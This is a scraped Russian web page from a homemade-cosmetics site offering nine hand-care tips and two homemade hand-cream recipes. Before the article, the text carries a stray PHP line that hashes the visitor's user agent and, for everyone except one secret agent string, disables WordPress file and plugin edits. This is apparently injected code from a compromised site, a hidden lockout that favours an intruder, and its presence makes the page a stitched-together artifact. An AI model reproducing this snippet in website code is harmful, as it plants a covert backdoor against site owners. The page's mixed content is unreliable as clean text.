if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рекомендации по уходу за руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

9 правил, которые сохранят кожу наших рук здоровой и бархатистой

Красивые руки это незаменимый элемент женской красоты. Для того чтобы продлить их молодость, следует соблюдать 9 простых рекомендаций, которые особо полезны для начинающих домохозяек

Кра­си­вые руки — это неза­ме­ни­мый эле­мент жен­ской кра­со­ты. Для того что­бы про­длить их моло­дость, сле­ду­ет соблю­дать несколь­ко про­стых реко­мен­да­ций, кото­рые осо­бо полез­ны для начи­на­ю­щих домо­хо­зя­ек. Вот 9 пра­вил, кото­рые помо­гут сохра­нить кра­со­ту наших ручек надол­го. И в кон­це бонус — 2 рецеп­та пита­тель­но­го кре­ма для рук сво­и­ми руками 😉

  1. Если кожа рук огру­бе­ла, то смяг­чить ее мож­но делая 30-минут­ные ван­ноч­ки из молоч­ной сыво­рот­ки или отва­ра картофеля.
  2. Очень силь­но пор­тить руки и жир, кото­рый скап­ли­ва­ет­ся верх­ней части в пери­од набо­ра веса. В борь­бе с ним могут помочь спе­ци­аль­ные упражнения.
  3. Жест­кая вода так­же отри­ца­тель­но вли­я­ет на руки. В резуль­та­те кон­так­та рук с жест­кой водой, кожа дела­ет­ся сухой.
  4. После мытья руки необ­хо­ди­мо вытирать.
  5. Если вы что-то мое­те с хими­че­ски­ми сред­ства­ми или сти­ра­е­те, обя­за­тель­но исполь­зуй­те перчатки!
  6. Еже­днев­но сто­ит исполь­зо­вать увлаж­ня­ю­щий или пита­тель­ный крем.
  7. Для мытья рук луч­ше все­го исполь­зо­вать дет­ское мыло, оно нано­сит мень­ше вреда.
  8. Рези­но­вые пер­чат­ки не сле­ду­ет носить более 5 минут.
  9. При вос­па­ле­ни­ях и тре­щи­нах помо­жет кар­то­фель­ная вода.

фото красивые рукиА в кон­це, как и обе­ща­ла, 2 рецеп­та пита­тель­но­го крема!

Рецепт питательного крема для ухода за руками с лимоном

В осен­нею вет­рен­ную пого­ду очень полез­но исполь­зо­вать сле­ду­ю­щий пита­тель­ный крем.  Четы­ре сто­ло­вых лож­ки гли­це­ри­на сме­ши­ва­ют со сто­ло­вой лож­кой сока лимо­на и сто­ло­вой лож­кой кар­то­фель­ной муки. Исполь­зу­ют в каче­стве ноч­но­го кре­ма для рук.

Крем на травах для ухода за кожей рук

А пита­тель­ный крем мож­но при­го­то­вить сле­ду­ю­щим обра­зом, залить 100 мл. кипят­ка ромаш­ку, подо­рож­ник и кален­ду­лу (по 1 ч. л.), насто­ять на водя­ной бане 60 минут, про­це­дить. Доба­вить в рас­твор мед (1 ч. л.) и сли­воч­ное мас­ло (50 гр.).


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!